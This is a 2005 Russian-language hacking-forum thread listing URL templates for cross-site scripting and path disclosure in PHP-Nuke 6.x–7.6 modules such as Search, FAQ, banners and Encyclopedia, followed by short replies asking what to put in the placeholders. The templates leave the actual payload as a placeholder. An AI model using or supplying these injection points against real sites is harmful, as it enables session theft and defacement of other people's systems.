PHP-Nuke 6.x, 7-7.6

Discussion in 'Уязвимости' started by (-=util=-), 8 Apr 2005.

  1. (-=util=-)

    (-=util=-) Banned

    Joined:
    2 Dec 2004
    Messages:
    337
    Likes Received:
    8
    Reputations:
    2
    http://[target]/[nuke_dir]/modules.php?
    name=Search&author=[author]&topic=
    0&min=999999999[XSS]&query=[our query]

    http://[target]/[nuke_dir]/modules.php?
    name=Search&author=[author]&topic=
    0&min=999999999[XSS]&query=
    [our_query]&type=users&category=2

    http://[target]/[nuke_dir]/modules.php?
    name=Search&author=[author]&topic=
    0&min=999999999[XSS]&query=
    [our_query]&type=comments&categ ory=2

    http://[target]/[nuke_dir]/modules.php?
    name=Search&author=[author]&topic=
    0&min=999999999[XSS]&query=
    [our_query]&type=stories&category=2

    http://[target]/[nuke_dir] /modules.php?
    name=Search&author=[author]&topic=
    0&min=999999999[XSS]&query=
    [our_query]&type=reviews&category=2

    http://[target]/[nuke_dir]/modules.php?
    name=FAQ&myfaq=yes&i d_cat=1&
    categories=45435[XSS]

    http://[target]/[nuke_dir]/banners.php?
    op=EmailStats&login=[our_login]&cid=1&bid=[XSS]

    http://[target]/[nuke_dir]/modules.php?name=
    Encyclopedia&file=index&op=terms&eid=1&ltr=[XSS]

    Удаленный пользователь может напрямую запросить некоторые сценарии и получить данные об установочной директории приложения. Примеры:

    http://[target]/[nuke_dir]/modules.php?name=Your_Account&op=userinfo
    http://[target]/[nuke_dir]/modules.php?name=Your_Account&op=my_headlines
    http://[target]/[nuke_dir]/modules.php?name=Encyclopedia&file=index&op=search
     
  2. Егорыч+++

    Staff Member

    Joined:
    27 May 2002
    Messages:
    1,373
    Likes Received:
    895
    Reputations:
    20
    Неплохо...
     
  3. KEZ

    KEZ Guest

    Reputations:
    0
    Половину Sql я видел на секлабе
     
  4. (-=util=-)

    (-=util=-) Banned

    Joined:
    2 Dec 2004
    Messages:
    337
    Likes Received:
    8
    Reputations:
    2
    только серьёзного нечего несделать.
     
  5. temon

    temon Elder - Старейшина

    Joined:
    6 Feb 2005
    Messages:
    114
    Likes Received:
    4
    Reputations:
    0
    А чё такое [our query] ::??
     
  6. m0nzt3r

    m0nzt3r моня

    Joined:
    22 Jun 2004
    Messages:
    2,096
    Likes Received:
    673
    Reputations:
    591
    это типа наш запрос =)) или вредный код . Учи Инглиш сЫнок :D
     
  7. dinar_007

    dinar_007 Мадемуазель

    Joined:
    18 Jan 2005
    Messages:
    1,019
    Likes Received:
    770
    Reputations:
    97
    чё-то у меня не катит или я чего-то недопонимаю???
     
  8. temon

    temon Elder - Старейшина

    Joined:
    6 Feb 2005
    Messages:
    114
    Likes Received:
    4
    Reputations:
    0
    А что нужно туда писать то?? это вопрос к m0nzt3r